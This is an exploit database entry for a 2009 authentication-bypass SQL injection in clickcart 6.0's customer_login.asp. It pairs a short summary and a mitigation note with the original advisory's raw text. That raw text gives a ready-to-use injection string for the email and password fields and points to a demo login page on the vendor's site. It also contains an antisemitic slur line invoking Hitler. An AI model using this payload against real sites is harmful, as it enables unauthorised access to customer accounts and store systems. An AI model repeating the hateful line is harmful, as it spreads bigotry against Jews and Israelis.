header-logo
Suggest Exploit
vendor:
clickcart
by:
Y3d D3v!L
7.5
CVSS
HIGH
Auth Bypass Remote SQL Injection
89
CWE
Product Name: clickcart
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: N/A
CPE: a:clicktech:clickcart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Auth Bypass Remote SQL Injection Vulnerability

A vulnerability in clicktech.com's clickcart 6.0 software allows an attacker to bypass authentication and gain access to the system. The vulnerability is caused by a SQL injection in the customer_login.asp page, which allows an attacker to use the 'r0' or '1=1--' username and password combination to gain access.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
 [☠]
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 [☠]
[~] Vendor: clicktech.com
 [☠]
[☠] Software: clickcart 6.0
 [☠]
[☠] author: ((я3d D3v!L))
 [☠]
[☠] Date: 2.2.2009
 [☠]
[☠] Home: WwW.aHACKER.biz
 [☠]
[☠] contact: N/A
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠

[☠] Exploit:

[☠] E-/\/\A!L : r0' or ' 1=1--
[☠] password : r0' or ' 1=1--

[☠]login 4 d3m0:

[☠]www.clicktech.com/clickcart6/customer_login.asp

N073:
FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))

GOD HELP GAZA!!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & Mr.DaNgeR & hesham_hacker & K374 & M4NON & EL z0hery
 [~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ۩۞۩๑ SEMSEM ๑۩۞۩ & {str0ke}
 [~]
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 [~]
[~] exploi6.biZ & ahacker.biz
 [~]
[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-02-03]